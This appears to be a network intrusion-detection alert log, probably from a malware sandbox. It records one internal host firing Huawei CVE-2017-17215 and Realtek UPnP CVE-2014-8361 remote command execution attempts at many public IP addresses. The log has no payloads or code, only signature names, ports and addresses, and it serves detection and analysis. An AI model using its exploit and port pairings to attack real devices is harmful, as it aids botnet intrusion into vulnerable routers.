                                                07/20/24-23:05:34.659618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974237215192.168.2.14197.152.249.5
                                                07/20/24-23:06:19.939162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613389852869192.168.2.14112.247.29.53
                                                07/20/24-23:05:40.341196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24206452869192.168.2.14146.54.173.69
                                                07/20/24-23:05:57.544145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5828652869192.168.2.1418.206.106.65
                                                07/20/24-23:06:09.714968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5086652869192.168.2.14115.182.22.138
                                                07/20/24-23:05:52.554753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5272652869192.168.2.1486.160.0.18
                                                07/20/24-23:05:37.556779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24171052869192.168.2.14198.163.171.175
                                                07/20/24-23:05:59.081357TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25289252869192.168.2.14217.8.249.6
                                                07/20/24-23:05:56.433907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406237215192.168.2.14197.75.72.223
                                                07/20/24-23:05:57.653975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4625252869192.168.2.14210.208.204.245
                                                07/20/24-23:07:32.121311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25472252869192.168.2.14145.225.20.14
                                                07/20/24-23:05:59.081357TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25685252869192.168.2.14206.48.160.223
                                                07/20/24-23:06:07.090928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614272652869192.168.2.14163.243.69.131
                                                07/20/24-23:05:57.854779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476652869192.168.2.14175.170.231.7
                                                07/20/24-23:06:13.006675TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615758452869192.168.2.1464.26.80.76
                                                07/20/24-23:05:46.381513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616084252869192.168.2.14181.238.128.43
                                                07/20/24-23:06:00.022949TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615865652869192.168.2.14175.185.115.85
                                                07/20/24-23:07:06.898582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689252869192.168.2.14217.234.142.206
                                                07/20/24-23:05:40.421092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25169052869192.168.2.1492.177.97.112
                                                07/20/24-23:05:36.058966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614799052869192.168.2.14179.21.144.79
                                                07/20/24-23:05:56.896492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4034652869192.168.2.14101.18.135.140
                                                07/20/24-23:06:35.309569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24484852869192.168.2.14221.15.178.178
                                                07/20/24-23:05:40.430092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25152052869192.168.2.14142.238.12.119
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004637215192.168.2.14157.233.107.21
                                                07/20/24-23:05:39.054227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732837215192.168.2.14157.247.21.120
                                                07/20/24-23:06:02.125044TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25452652869192.168.2.14142.64.187.253
                                                07/20/24-23:05:37.444466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298452869192.168.2.1490.248.254.246
                                                07/20/24-23:05:59.057513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298052869192.168.2.14174.132.14.103
                                                07/20/24-23:06:01.772858TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614681852869192.168.2.14216.197.0.6
                                                07/20/24-23:05:46.064615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805637215192.168.2.1481.99.224.85
                                                07/20/24-23:07:03.123323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5225852869192.168.2.14113.222.174.92
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751837215192.168.2.1441.172.33.196
                                                07/20/24-23:06:30.233615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5891252869192.168.2.14191.229.242.79
                                                07/20/24-23:06:05.291750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613814852869192.168.2.14140.10.108.158
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355037215192.168.2.14157.198.219.2
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770637215192.168.2.14197.168.57.25
                                                07/20/24-23:05:57.161619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23459052869192.168.2.14166.179.95.6
                                                07/20/24-23:05:57.939156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4471252869192.168.2.14154.15.57.14
                                                07/20/24-23:05:38.694694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3582252869192.168.2.1498.239.232.196
                                                07/20/24-23:06:06.576731TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5737452869192.168.2.14104.101.179.225
                                                07/20/24-23:06:03.206868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287452869192.168.2.14114.102.232.116
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377437215192.168.2.14157.113.28.155
                                                07/20/24-23:05:35.998652TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3484452869192.168.2.1431.136.109.228
                                                07/20/24-23:06:18.014309TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3421852869192.168.2.14109.168.44.251
                                                07/20/24-23:05:33.859348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191037215192.168.2.14197.57.175.45
                                                07/20/24-23:05:37.489810TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25222252869192.168.2.14105.87.255.111
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626037215192.168.2.14157.161.247.51
                                                07/20/24-23:05:48.172604TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613486252869192.168.2.14181.136.224.195
                                                07/20/24-23:06:35.340397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024452869192.168.2.14182.124.0.183
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995037215192.168.2.14157.33.158.151
                                                07/20/24-23:06:01.303827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5215452869192.168.2.14155.99.8.58
                                                07/20/24-23:05:48.261264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5554452869192.168.2.1444.18.231.106
                                                07/20/24-23:06:19.817334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4802252869192.168.2.14137.15.168.190
                                                07/20/24-23:07:37.539445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614931852869192.168.2.14148.3.109.194
                                                07/20/24-23:06:54.435154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25100252869192.168.2.14204.242.118.241
                                                07/20/24-23:05:37.556915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4087452869192.168.2.1498.139.133.85
                                                07/20/24-23:06:20.035971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4276052869192.168.2.1438.62.197.212
                                                07/20/24-23:05:52.450049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030052869192.168.2.14106.160.141.160
                                                07/20/24-23:05:37.540434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5627052869192.168.2.14195.182.30.127
                                                07/20/24-23:06:02.324702TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614181852869192.168.2.14166.90.41.67
                                                07/20/24-23:05:56.297302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335837215192.168.2.14197.76.154.181
                                                07/20/24-23:05:50.559359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685637215192.168.2.14157.6.198.50
                                                07/20/24-23:05:39.773172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233637215192.168.2.14157.175.88.48
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513837215192.168.2.14157.221.219.70
                                                07/20/24-23:06:19.714340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3427852869192.168.2.14130.55.222.14
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059837215192.168.2.14197.11.4.107
                                                07/20/24-23:05:38.619944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3889252869192.168.2.14144.76.154.113
                                                07/20/24-23:06:01.972621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3292652869192.168.2.14118.206.217.195
                                                07/20/24-23:05:50.537576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970837215192.168.2.1441.139.143.110
                                                07/20/24-23:06:01.173503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4237052869192.168.2.14135.229.90.34
                                                07/20/24-23:06:16.055924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23902852869192.168.2.1460.32.244.232
                                                07/20/24-23:06:25.857962TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614435652869192.168.2.14158.189.117.28
                                                07/20/24-23:06:15.999787TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613624052869192.168.2.1497.53.99.115
                                                07/20/24-23:05:46.759276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616064452869192.168.2.14196.214.249.37
                                                07/20/24-23:05:57.187455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966252869192.168.2.14179.139.227.149
                                                07/20/24-23:06:00.123303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24944452869192.168.2.14188.68.33.45
                                                07/20/24-23:06:18.935568TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613915652869192.168.2.1490.186.107.209
                                                07/20/24-23:06:25.893173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4493052869192.168.2.1494.16.231.9
                                                07/20/24-23:05:40.462607TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25756852869192.168.2.14101.65.28.197
                                                07/20/24-23:05:36.443094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613365052869192.168.2.1437.213.85.230
                                                07/20/24-23:05:52.483885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24188452869192.168.2.14179.214.191.139
                                                07/20/24-23:06:27.747099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614942052869192.168.2.14117.116.89.124
                                                07/20/24-23:05:46.536983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5914052869192.168.2.14194.100.123.200
                                                07/20/24-23:05:58.204539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3554452869192.168.2.14191.96.252.254
                                                07/20/24-23:05:39.055908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772437215192.168.2.14197.71.39.138
                                                07/20/24-23:05:59.588014TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24458852869192.168.2.1448.252.151.54
                                                07/20/24-23:05:57.623283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5394052869192.168.2.14113.77.223.1
                                                07/20/24-23:05:39.482560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615609452869192.168.2.1458.46.182.160
                                                07/20/24-23:05:40.338978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096052869192.168.2.14217.104.148.40
                                                07/20/24-23:05:59.457721TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23606852869192.168.2.1446.67.182.106
                                                07/20/24-23:05:59.213618TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615793052869192.168.2.14183.146.251.234
                                                07/20/24-23:05:57.625091TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3784652869192.168.2.1447.203.133.138
                                                07/20/24-23:05:48.216159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4855652869192.168.2.14164.86.63.183
                                                07/20/24-23:05:56.036527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582037215192.168.2.14196.42.232.134
                                                07/20/24-23:05:38.080292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615722052869192.168.2.1445.124.106.123
                                                07/20/24-23:06:14.723902TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3291652869192.168.2.1448.7.10.100
                                                07/20/24-23:05:37.556915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4151452869192.168.2.14100.147.99.239
                                                07/20/24-23:05:58.855356TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614257252869192.168.2.14104.109.248.86
                                                07/20/24-23:05:33.855567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415837215192.168.2.14197.237.152.228
                                                07/20/24-23:05:57.802006TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614449452869192.168.2.14210.75.205.158
                                                07/20/24-23:05:58.373329TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5034252869192.168.2.14221.147.86.128
                                                07/20/24-23:05:38.195370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4537052869192.168.2.1492.177.238.200
                                                07/20/24-23:05:48.015093TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615317052869192.168.2.14166.54.252.123
                                                07/20/24-23:05:50.542034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693637215192.168.2.1441.7.54.25
                                                07/20/24-23:05:34.625707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185037215192.168.2.14197.26.32.199
                                                07/20/24-23:06:20.768887TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615814852869192.168.2.14149.227.126.225
                                                07/20/24-23:05:52.514709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25547452869192.168.2.1460.4.213.153
                                                07/20/24-23:05:39.685214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233237215192.168.2.14197.44.206.131
                                                07/20/24-23:05:34.622609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495037215192.168.2.1441.65.214.53
                                                07/20/24-23:05:37.524062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5675852869192.168.2.1493.120.173.5
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979237215192.168.2.14192.84.129.146
                                                07/20/24-23:05:45.142955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912452869192.168.2.14169.220.199.128
                                                07/20/24-23:05:57.211571TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613423852869192.168.2.14156.132.102.218
                                                07/20/24-23:05:59.674473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24184652869192.168.2.1457.248.59.177
                                                07/20/24-23:05:34.627949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682637215192.168.2.14197.113.224.94
                                                07/20/24-23:05:59.128245TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25380852869192.168.2.14133.109.89.140
                                                07/20/24-23:06:02.182231TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26089452869192.168.2.14126.57.33.85
                                                07/20/24-23:05:37.497829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4444052869192.168.2.14123.111.19.233
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587237215192.168.2.1436.141.95.11
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533637215192.168.2.1441.49.32.49
                                                07/20/24-23:06:08.195958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614946252869192.168.2.1443.139.32.29
                                                07/20/24-23:05:36.580139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425837215192.168.2.14157.35.171.1
                                                07/20/24-23:05:38.615405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6051452869192.168.2.14119.243.24.21
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432837215192.168.2.1481.128.24.198
                                                07/20/24-23:06:26.204720TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614949652869192.168.2.1449.174.125.250
                                                07/20/24-23:05:47.999691TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5293052869192.168.2.1437.61.131.138
                                                07/20/24-23:05:35.774972TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614115252869192.168.2.1414.148.186.244
                                                07/20/24-23:05:57.124977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709852869192.168.2.14190.103.96.175
                                                07/20/24-23:05:45.392754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877837215192.168.2.1435.58.143.116
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5229837215192.168.2.14197.180.179.125
                                                07/20/24-23:06:44.280799TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25747452869192.168.2.14163.142.81.29
                                                07/20/24-23:05:59.954497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613719252869192.168.2.14173.165.96.254
                                                07/20/24-23:06:03.368314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4080852869192.168.2.1442.230.189.186
                                                07/20/24-23:05:57.186863TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613732652869192.168.2.1468.46.136.41
                                                07/20/24-23:05:57.906796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614414852869192.168.2.14191.158.120.67
                                                07/20/24-23:05:37.472951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269052869192.168.2.14205.9.202.98
                                                07/20/24-23:05:45.439167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440837215192.168.2.14197.16.145.88
                                                07/20/24-23:06:09.610263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797852869192.168.2.14198.60.250.215
                                                07/20/24-23:05:52.507640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23530852869192.168.2.1432.146.109.53
                                                07/20/24-23:05:59.312502TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25716852869192.168.2.14154.170.187.222
                                                07/20/24-23:06:15.027910TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613596652869192.168.2.14111.11.77.117
                                                07/20/24-23:05:37.476168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006452869192.168.2.14198.22.21.63
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990437215192.168.2.14157.28.72.8
                                                07/20/24-23:07:34.258673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4932252869192.168.2.14123.51.179.219
                                                07/20/24-23:06:01.392409TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4451652869192.168.2.1467.151.109.138
                                                07/20/24-23:06:53.291407TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23362252869192.168.2.14143.92.41.114
                                                07/20/24-23:05:48.767395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957237215192.168.2.14157.13.175.113
                                                07/20/24-23:05:48.821008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528237215192.168.2.14198.167.54.50
                                                07/20/24-23:05:40.478948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25046652869192.168.2.149.176.88.108
                                                07/20/24-23:06:01.215644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24076252869192.168.2.14164.140.163.126
                                                07/20/24-23:06:11.551203TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25655452869192.168.2.14176.101.171.67
                                                07/20/24-23:05:58.954404TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5908652869192.168.2.1453.94.167.97
                                                07/20/24-23:05:37.462432TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5004252869192.168.2.1450.167.84.34
                                                07/20/24-23:05:58.104584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614512252869192.168.2.1465.77.245.190
                                                07/20/24-23:05:35.510955TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614414452869192.168.2.14132.232.1.40
                                                07/20/24-23:07:28.537428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4946252869192.168.2.14159.172.13.1
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561837215192.168.2.145.36.73.89
                                                07/20/24-23:05:59.136809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3927452869192.168.2.1489.185.47.122
                                                07/20/24-23:05:57.599614TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613856652869192.168.2.1420.149.220.242
                                                07/20/24-23:05:42.220683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579637215192.168.2.14157.128.237.233
                                                07/20/24-23:05:45.435096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.14209.25.44.192
                                                07/20/24-23:05:39.879670TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3841052869192.168.2.14119.64.194.144
                                                07/20/24-23:06:35.384402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4387852869192.168.2.14123.248.173.31
                                                07/20/24-23:05:56.454514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769237215192.168.2.14197.169.208.157
                                                07/20/24-23:05:57.134757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615550252869192.168.2.1437.248.27.96
                                                07/20/24-23:06:01.850879TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24388052869192.168.2.14152.22.234.187
                                                07/20/24-23:06:58.927502TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613869652869192.168.2.14123.128.247.166
                                                07/20/24-23:05:37.462705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24727652869192.168.2.14162.96.80.170
                                                07/20/24-23:05:40.371348TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24790652869192.168.2.14194.209.238.48
                                                07/20/24-23:05:38.429491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613670452869192.168.2.14175.146.247.15
                                                07/20/24-23:05:46.763392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5879252869192.168.2.14170.66.204.146
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917837215192.168.2.14157.80.152.234
                                                07/20/24-23:05:58.174966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462052869192.168.2.14160.37.99.47
                                                07/20/24-23:05:59.315621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3772252869192.168.2.14223.25.114.136
                                                07/20/24-23:06:02.735063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5109852869192.168.2.14152.214.0.28
                                                07/20/24-23:05:40.446932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24034652869192.168.2.14219.160.119.18
                                                07/20/24-23:06:03.755462TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24602252869192.168.2.14187.76.135.2
